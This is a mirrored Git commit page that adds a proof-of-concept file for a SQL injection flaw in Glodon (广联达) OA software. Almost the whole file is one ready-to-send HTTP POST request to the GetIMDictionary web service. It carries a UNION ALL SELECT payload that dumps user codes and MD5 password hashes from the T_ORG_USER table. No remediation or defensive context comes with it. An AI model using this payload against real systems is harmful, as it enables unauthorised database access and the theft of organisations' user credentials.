mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 广联达oa sql注入漏洞 .md
This commit is contained in:
parent
2d64c01725
commit
2443c015ce
17
广联达oa sql注入漏洞 .md
Normal file
17
广联达oa sql注入漏洞 .md
Normal file
@ -0,0 +1,17 @@
|
||||
## 广联达oa sql注入漏洞 POC
|
||||
```
|
||||
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
|
||||
Host: xxx.com
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
|
||||
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Cookie:
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 88
|
||||
|
||||
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user